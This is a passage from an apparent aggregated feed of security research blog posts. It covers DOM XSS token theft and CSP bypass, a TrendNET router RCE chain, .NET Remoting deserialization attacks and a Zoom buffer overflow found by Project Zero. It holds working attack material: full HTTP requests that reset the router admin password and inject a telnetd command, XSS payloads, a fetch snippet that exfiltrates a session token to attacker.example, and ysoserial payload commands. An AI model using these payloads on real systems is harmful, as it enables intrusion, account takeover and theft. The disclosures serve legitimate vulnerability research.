            type: "credentialConfig",
            credentialConfig: credentialConfig
        }, "*"))

https://feedback.companyA.com/ created a PostMessage listener that validated the message origin as https://abc.cloudfront.net. If the message data type was IframeLoaded, it sent a PostMessage back with credentialConfig data.

credentialConfig included a session token:

{
    "region": "en-uk",
    "environment": "production",
    "userId": "<USERID>",
    "sessionToken": "Bearer <SESSIONTOKEN>"
}

Thus, by sending the PostMessage to trigger an XSS on https://abc.cloudfront.net/iframe_chat.html, the XSS would then run arbitrary JavaScript that sent another PostMessage from https://abc.cloudfront.net/iframe_chat.html to https://feedback.companyA.com/ which would leak the session token.

Based on this, I modified the XSS payload:

{
    "versionNumber": "2",
    "config": "a;window.addEventListener(`message`, (event) => {alert(JSON.stringify(event.data))});parent.postMessage({type:`IframeLoaded`},`*`)//",
    "configs": {
        "a": "a
    }
}

The XSS received the session data from the parent iFrame on https://feedback.companyA.com/ and exfiltrated the stolen sessionToken to an attacker-controlled server (I simply used alert here).
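In a real attack, the alert in the injected listener would be swapped for an exfiltration request; a sketch of that variant follows (the collection URL is a placeholder):

window.addEventListener(`message`, (event) => {
  // Forward the leaked credentialConfig (including the sessionToken) to the attacker
  fetch(`https://attacker.example/collect`, {
    method: `POST`,
    mode: `no-cors`,
    body: JSON.stringify(event.data)
  });
});
parent.postMessage({type: `IframeLoaded`}, `*`);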

Puzzle B: Bypassing CSP with Newline Open Redirect

While exploring the OAuth flow of Company B, I noticed something strange about its OAuth authorization page. Typically, OAuth authorization pages present some kind of confirmation button to link an account. For example, here's Twitter's OAuth authorization page to log in to GitLab:

OAuth Login

Company B's page used a URL with the following format: https://accept.companyb/confirmation?domain=oauth.companyb.com&state=<STATE>&client=<CLIENT ID>. Once the page was loaded, it would dynamically send a GET request to oauth.companyb.com/oauth_data?clientID=<CLIENT ID>. This returned some data to populate the page's contents:

{
    "app": {
        "logoUrl": <PAGE LOGO URL>,
        "name": <NAME>,
        "link": <URL> ,
        "introduction": "A cool app!"
        ...
    }
}

By playing around with this response data, I realised that introduction was injected into the page without any sanitisation. If I could control the destination of the GET request and subsequently the response, it would be possible to cause an XSS.

Fortunately, it appeared that the domain parameter allowed me to control the domain of the GET request. However, when I set this to my own domain, the request failed to execute and raised a Content Security Policy (CSP) error. I quickly checked the CSP of the page:

Content-Security-Policy: default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; script-src 'self' https: *.companyb.com; object-src 'none';

When dynamic HTTP requests are made, they adhere to the connect-src CSP rule. In this case, the default-src rule meant that only requests to *.companyb.com and *.amazonaws.com were allowed. Unfortunately for the company, *.amazonaws.com created a big loophole: since AWS S3 files are hosted on *.s3.amazonaws.com, I could still send requests to my attacker-controlled bucket! Furthermore, CORS would not be an issue as AWS allows users to set the CORS policies of buckets.
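For illustration, a permissive CORS policy on the attacker-controlled bucket might look like the following (JSON format as accepted by the S3 console; the values are deliberately broad and purely illustrative):

[
    {
        "AllowedHeaders": ["*"],
        "AllowedMethods": ["GET"],
        "AllowedOrigins": ["*"],
        "ExposeHeaders": []
    }
]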

I quickly hosted a JSON file with text as <script>alert()</script> on https://myevilbucket.s3.amazonaws.com/oauth_data.json, then browsed to https://accept.companyb/confirmation?domain=myevilbucket.s3.amazonaws.com%2fpayload.json%3F&state=<STATE>&client=<CLIENT ID>. The page successfully requested my file at https://myevilbucket.s3.amazonaws.com/payload.json?/oauth_data?clientID=<CLIENT ID>, then... nothing.

One more problem remained: the CSP for script-src only allowed for self or *.companyb.com for HTTPS. Luckily, I had an open redirect on t.companyb.com saved for such situations. The vulnerable endpoint would redirect to the value of the url parameter but validate if the parameter ended in companyb.com. However, it allowed a newline character %0A in the subdomain section, which would be truncated by browsers such that http://t.companyb.com/redirect?url=http%3A%2F%2Fevil.com%0A.companyb.com%2F actually redirected to https://evil.com/%0A.companyb.com/ instead.

Using this bypass, I saved my final XSS payload at the path <NEWLINE CHARACTER>.companyb.com in my web server's document root. I then injected a script tag whose src pointed to the open redirect; this passed the CSP check but eventually redirected to the final payload.
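For illustration, the injected introduction value could have looked roughly like this (the redirect endpoint and encoding follow the open redirect described above; everything else is schematic):

{
    "app": {
        ...
        "introduction": "<script src='https://t.companyb.com/redirect?url=https%3A%2F%2Fevil.com%0A.companyb.com%2F'></script>"
    }
}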

Diagram 2

Conclusion

Both companies awarded bonuses for my XSS reports due to their complexity and ability to bypass hardened execution environments. I hope that by documenting my thought processes, you can also gain a few extra tips to solve DOM XSS puzzles.

TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1

ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false

ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

.NET Remoting Revisited

27 January 2022 at 14:49

.NET Remoting is the built-in architecture for remote method invocation in .NET. It is also the origin of the (in-)famous BinaryFormatter and SoapFormatter serializers and not just for that reason a promising target to watch for.

This blog post attempts to give insights into its features, security measures, and especially its weaknesses/vulnerabilities that often result in remote code execution. We're also introducing major additions to the ExploitRemotingService tool, a new ObjRef gadget for YSoSerial.Net, and finally a RogueRemotingServer as counterpart to the ObjRef gadget.

If you already understand the internals of .NET Remoting, you may skip the introduction and proceed right to Security Features, Pitfalls, and Bypasses.

Introduction

.NET Remoting is deeply integrated into the .NET Framework and allows invocation of methods across so-called remoting boundaries. These can be different app domains within a single process, different processes on the same computer, or different processes on different computers. Supported transports between the client and server are HTTP, IPC (named pipes), and TCP.

Here is a simple example for illustration: the server creates and registers a transport server channel and then registers the class as a service with a well-known name at the server's registry:

var channel = new TcpServerChannel(12345);
ChannelServices.RegisterChannel(channel);
RemotingConfiguration.RegisterWellKnownServiceType(
    typeof(MyRemotingClass),
    "MyRemotingClass"
);

Then a client just needs the URL of the registered service to do remoting with the server:

var remote = (MyRemotingClass)RemotingServices.Connect(
    typeof(MyRemotingClass),
    "tcp://remoting-server:12345/MyRemotingClass"
);

With this, every invocation of a method or property accessor on remote gets forwarded to the remoting server, executed there, and the result gets returned to the client. This all happens transparently to the developer.

And although .NET Remoting was already deprecated with the release of .NET Framework 3.0 in 2006 and is no longer available on .NET Core and .NET 5+, it is still around, even in contemporary enterprise-level software products.

Remoting Internals

If you are interested in how .NET Remoting works under the hood, here are some insights.

In simple terms: when the client connects to the remoting object provided by the server, it creates a RemotingProxy that implements the specified type MyRemotingClass. All method invocations on remote at the client (except for GetType() and GetHashCode()) will get sent to the server as remoting calls. When a method gets invoked on remote, the proxy creates a MethodCall object that holds the information of the method and passed parameters. It is then passed to a chain of sinks that prepare the MethodCall and handle the remoting communication with the server over the given transport.

On the server side, the received request is also passed to a chain of sinks that reverses the process, which also includes deserialization of the MethodCall object. It ends in a dispatcher sink, which invokes the actual implementation of the method with the passed parameters. The result of the method invocation is then put in a MethodResponse object and gets returned to the client where the client sink chain deserializes the MethodResponse object, extracts the returned object and passes it back to the RemotingProxy.

Channel Sinks

When the client or server creates a channel (either explicitly or implicitly by connecting to a remote service), it also sets up a chain of sinks for processing outgoing and incoming requests. For the server chain, the first sink is a transport sink, followed by formatter sinks (this is where the BinaryFormatter and SoapFormatter are used), and ending in the dispatch sink. It is also possible to add custom sinks. For the three transports, the server default chains are as follows:

  • HttpServerChannel:
    HttpServerTransportSink → SdlChannelSink → SoapServerFormatterSink → BinaryServerFormatterSink → DispatchChannelSink
  • IpcServerChannel:
    IpcServerTransportSink → BinaryServerFormatterSink → SoapServerFormatterSink → DispatchChannelSink
  • TcpServerChannel:
    TcpServerTransportSink → BinaryServerFormatterSink → SoapServerFormatterSink → DispatchChannelSink

On the client side, the sink chain looks similar but in reversed order: first a formatter sink and finally the transport sink.

Note that the default client sink chain has a default formatter for each transport (HTTP uses SOAP, IPC and TCP use binary format) while the default server sink chain can process both formats. The default sink chains are only used if the channel was not created with an explicit IClientChannelSinkProvider and/or IServerChannelSinkProvider.

Passing Parameters and Return Values

Parameter values and return values can be transferred in two ways:

  • by value: if either the type is serializable (cf. Type.IsSerializable) or if there is a serialization surrogate for the type (see following paragraphs)
  • by reference: if the type extends MarshalByRefObject (cf. Type.IsMarshalByRef)

In case of the latter, the objects need to get marshaled using one of the RemotingServices.Marshal methods. They register the object at the server's registry and return an ObjRef instance that holds the URL and type information of the marshaled object.

The marshaling happens automatically during serialization by the serialization surrogate class RemotingSurrogate that is used for the BinaryFormatter/SoapFormatter in .NET Remoting (see CoreChannel.CreateBinaryFormatter(bool, bool) and CoreChannel.CreateSoapFormatter(bool, bool)). A serialization surrogate allows customizing the serialization/deserialization of specified types.

In case of objects extending MarshalByRefObject, the RemotingSurrogateSelector returns a RemotingSurrogate (see RemotingSurrogateSelector.GetSurrogate(Type, StreamingContext, out ISurrogateSelector)). It then calls the RemotingSurrogate.GetObjectData(Object, SerializationInfo, StreamingContext) method, which calls RemotingServices.GetObjectData(object, SerializationInfo, StreamingContext), which then calls RemotingServices.MarshalInternal(MarshalByRefObject, string, Type). That basically means that every remoting object extending MarshalByRefObject is substituted with an ObjRef and thus passed by reference instead of by value.

On the receiving side, if an ObjRef gets deserialized by the BinaryFormatter/SoapFormatter, the IObjectReference.GetRealObject(StreamingContext) implementation of ObjRef gets called eventually. That interface method is used to replace an object during deserialization with the object returned by that method. In case of ObjRef, the method results in a call to RemotingServices.Unmarshal(ObjRef, bool), which creates a RemotingProxy of the type and target URL specified in the deserialized ObjRef.

That means, in .NET Remoting all objects extending MarshalByRefObject are passed by reference using an ObjRef. And deserializing an ObjRef with a BinaryFormatter/SoapFormatter (not just limited to .NET Remoting) results in the creation of a RemotingProxy.

With this knowledge in mind, it should be easier to follow the rest of this post.

Previous Work

Most of the issues of .NET Remoting and the runtime serializers BinaryFormatter/SoapFormatter have already been identified by James Forshaw in his papers and blog posts.

We highly encourage you to take the time to read the papers/posts. They are also the foundation of the ExploitRemotingService tool that will be detailed in ExploitRemotingService Explained further down in this post.

Security Features, Pitfalls, and Bypasses

.NET Remoting is fairly configurable. The following security aspects are built-in and can be configured using special channel and formatter properties:

Authentication
  • HTTP Channel: n/a
  • IPC Channel: n/a
  • TCP Channel: secure=bool channel property or ISecurableChannel.IsSecured (via NegotiateStream; default: false)

Authorization
  • HTTP Channel: n/a
  • IPC Channel: authorizationGroups=Windows/AD Group channel property (default: thread owner is allowed, NT Authority\Network group (SID S-1-5-2) is denied); CommonSecurityDescriptor passed to an IpcServerChannel constructor
  • TCP Channel: custom IAuthorizeRemotingConnection class, passed via the authorizationModule channel property or to a TcpServerChannel constructor

Impersonation
  • HTTP Channel: n/a
  • IPC Channel: impersonate=bool (default: false)
  • TCP Channel: impersonate=bool (default: false)

Conf., Int., Auth. Protection
  • HTTP Channel: n/a
  • IPC Channel: n/a
  • TCP Channel: protectionLevel={None, Sign, EncryptAndSign} channel property

Interface Binding
  • HTTP Channel: n/a
  • IPC Channel: n/a
  • TCP Channel: rejectRemoteRequests=bool (loopback only, default: false), bindTo=address (specific IP address, default: n/a)

Pitfalls and important notes on these security features:

HTTP Channel
  • No security features provided; ought to be implemented in IIS or by custom server sinks.
IPC Channel
  • By default, access to named pipes created by the IPC server channel is denied to the NT Authority\Network group (SID S-1-5-2), i.e., they are only accessible from the same machine. However, by using authorizationGroup, the network restriction is not in place, so the group that is allowed to access the named pipe may also do so remotely (not supported by the default IpcClientTransportSink, though).
TCP Channel
  • With a secure TCP channel, authentication is required. However, if no custom IAuthorizeRemotingConnection is configured for authorization, it is possible to log on with any valid Windows account, including NT Authority\Anonymous Logon (SID S-1-5-7).

ExploitRemotingService Explained

James Forshaw also released ExploitRemotingService, which contains a tool for attacking .NET Remoting services via IPC/TCP by the various attack techniques. We'll try to explain them here.

There are basically two attack modes:

raw
Exploit BinaryFormatter/SoapFormatter deserialization (see also YSoSerial.Net)
all other commands (see -h)
Write a FakeAsm assembly to the server's file system and load a type from it that gets registered at the server. That type is then accessible via the existing .NET Remoting channel and can perform various commands.

To see the real beauty of his sorcery and craftsmanship, we'll try to explain the different operating options for the FakeAsm exploitation and their effects:

without options
Send a FakeMessage that extends MarshalByRefObject and thus is a reference (ObjRef) to an object on the attacker's server. On deserialization, the victim's server creates a proxy that transparently forwards all method invocations to the attacker's server. By exploiting a TOCTOU flaw, the get_MethodBase() property method of the sent message (FakeMessage) can be adjusted so that even static methods can be called. This allows calling File.WriteAllBytes(string, byte[]) on the victim's machine.
--useser
Send a forged Hashtable with a custom IEqualityComparer by reference that implements GetHashCode(object), which gets called by the victim server on the attacker's server remotely. As for the key, a FileInfo/DirectoryInfo object is wrapped in a SerializationWrapper that ensures the attacker's object gets marshaled by value instead of by reference. However, on the remote call of GetHashCode(object), the victim's server sends the FileInfo/DirectoryInfo by reference so that the attacker has a reference to the FileInfo/DirectoryInfo object on the victim.
--uselease
Call MarshalByRefObject.InitializeLifetimeService() on a published object to get an ILease instance. Then call Register(ISponsor) with a MarshalByRefObject object as parameter to make the server call IConvertible.ToType(Type, IFormatProvider) on an object of the attacker's server, which then can deliver the deserialization payload.

Now the problem with the --uselease option is that the remote class needs to return an actual ILease object and not null. This may happen if the virtual MarshalByRefObject.InitializeLifetimeService() method is overridden. But the main principle of sending an ObjRef referencing an object on the attacker's server can be generalized with any method accepting a parameter. That is why we have added the --useobjref option to ExploitRemotingService (see also Community Contributions further below):

--useobjref
Call the MarshalByRefObject.GetObjRef(Type) method with an ObjRef as parameter value. Similarly to --uselease, the server calls IConvertible.ToType(Type, IFormatProvider) on the proxy, which sends a remoting call to the attacker's server.

Security Measures and Troubleshooting

If no custom errors are enabled and a RemotingException gets returned by the server, the following may help to identify the cause and to find a solution:

  • "Requested Service not found"
    Reason: the URI of an existing remoting service must be known; there is no way to iterate them.
    ExampleRemotingService options: n/a
    ExploitRemotingService bypass options: --nulluri may work if the remoting service has not been servicing any requests yet.
  • NotSupportedException with link to KB 390633
    Reason: received IMessage objects that are MarshalByRefObject are disallowed (see AppSettings.AllowTransparentProxyMessage).
    ExampleRemotingService options: -d
    ExploitRemotingService bypass options: --uselease, --useobjref
  • SecurityException with PermissionSet info
    Reason: Code Access Security (CAS) restricted permissions are in place (TypeFilterLevel.Low).
    ExampleRemotingService options: -t low
    ExploitRemotingService bypass options: --uselease, --useobjref

Community Contributions

Our research on .NET Remoting led to some new insights and discoveries that we want to share with the community. Together with this blog post, we have prepared the following contributions and new releases.

ExploitRemotingService

The ExploitRemotingService is already a magnificent tool for exploiting .NET Remoting services. However, we have made some additions to ExploitRemotingService that we think are worthwhile:

--useobjref option
This newly added option allows using the ObjRef trick described above.
--remname option
Assemblies can only be loaded by name once. If that loading fails, the runtime remembers that and avoids trying to load it again. That means writing the FakeAsm.dll to the target server's file system and loading a type from that assembly must succeed on the first attempt. The problem is finding the proper location to write the assembly to where it will be searched by the runtime (ExploitRemotingService provides the options --autodir and --installdir=… to specify the location to write the DLL to). We have modified ExploitRemotingService so that --remname sets the name of the FakeAsm assembly, making it possible to have multiple attempts at writing the assembly file to an appropriate location.
--ipcserver option
As IPC server channels may be accessible remotely, the --ipcserver option allows specifying the server's name for a remote connection.

YSoSerial.Net

The new ObjRef gadget is basically the equivalent of the sun.rmi.server.UnicastRef class used by the JRMPClient gadget in ysoserial for Java: on deserialization via BinaryFormatter/SoapFormatter, the ObjRef gets transformed to a RemotingProxy and method invocations on that object result in the attempt to send an outgoing remote method call to a specified target .NET Remoting endpoint. This can then be used with the RogueRemotingServer described below.

RogueRemotingServer

The newly released RogueRemotingServer is the counterpart of the ObjRef gadget for YSoSerial.Net. It is the equivalent of the JRMPListener server in ysoserial for Java and allows starting a rogue remoting server that delivers a raw BinaryFormatter/SoapFormatter payload via HTTP/IPC/TCP.

Example of ObjRef Gadget and RogueRemotingServer

Here is an example of how these tools can be used together:

# generate a SOAP payload for popping MSPaint
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c MSPaint.exe > MSPaint.soap

# start server to deliver the payload on all interfaces
RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0/index.html MSPaint.soap
# test the ObjRef gadget with the target http://attacker/index.html
ysoserial.exe -f BinaryFormatter -g ObjRef -o raw -c http://attacker/index.html -t

During deserialization of the ObjRef gadget, an outgoing .NET Remoting method call request gets sent to the RogueRemotingServer, which replies with the TextFormattingRunProperties gadget payload.

Conclusion

.NET Remoting was deprecated a long time ago for obvious reasons. If you are a developer, don't use it and migrate from .NET Remoting to WCF.

If you have detected a .NET Remoting service and want to exploit it, we recommend the excellent ExploitRemotingService by James Forshaw, which works with IPC and TCP (for HTTP, have a look at Finding and Exploiting .NET Remoting over HTTP using Deserialisation by Soroush Dalili). If that doesn't succeed, you may want to try the enhancements added in our fork of ExploitRemotingService; in particular, the --useobjref technique and/or naming the FakeAsm assembly via --remname might help. And even if none of these work, you may still be able to invoke arbitrary methods on the exposed objects and take advantage of that.

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.
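A minimal Frida sketch of this kind of hook is shown below (it assumes SSL_write is resolvable as an export and follows the usual OpenSSL SSL_write(ssl, buf, num) layout; in the actual client the function was located via log strings, so a hard-coded address may be needed instead of an export lookup):

// hook_ssl_write.js -- dump outgoing plaintext before it is encrypted
Interceptor.attach(Module.getExportByName(null, "SSL_write"), {
    onEnter: function (args) {
        var buf = args[1];
        var len = args[2].toInt32();
        // Print the first bytes of each outgoing buffer (XMPP stanzas and other traffic)
        console.log(hexdump(buf, { length: Math.min(len, 256), ansi: false }));
    }
});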

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different from the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn't load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don't have source code available. Instead, I compiled my own fuzzing stub, which called the function I wanted to fuzz, as a relocatable library that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(
    msg_db, &this->str_len, consume_bytes, error_out);

str_len = this->str_len;
if ( str_len )
{
    mem = operator new[](str_len);
    out_len = 0;
    this->str_mem = mem;
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read_str_with_len(
    msg_db_t* msg, signed __int8 *mem, unsigned int *len)
{
  if ( !msg->invalid )
  {
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);
    if ( !msg->invalid )
    {
      if ( *len )
        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read(msg, mem, *len, 0);
    }
  }
  return msg;
}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.
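A sketch of how such a hook might swap a legitimate outgoing packet for a malformed one follows (the packet-matching heuristic and payload bytes are placeholders, not the actual serialized format):

var malformed = [0x41, 0x41, 0x41];  // placeholder: crafted ssb-serialized bytes with mismatched lengths

function looksLikeTargetPacket(data) {
    // placeholder heuristic for recognizing the conf_send_msg_req packet
    return false;
}

Interceptor.attach(Module.getExportByName(null, "SSL_write"), {
    onEnter: function (args) {
        var len = args[2].toInt32();
        var data = args[1].readByteArray(len);
        if (looksLikeTargetPacket(data)) {
            args[1].writeByteArray(malformed);   // overwrite the outgoing buffer in place
            args[2] = ptr(malformed.length);     // shrink the length argument to match
        }
    }
});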

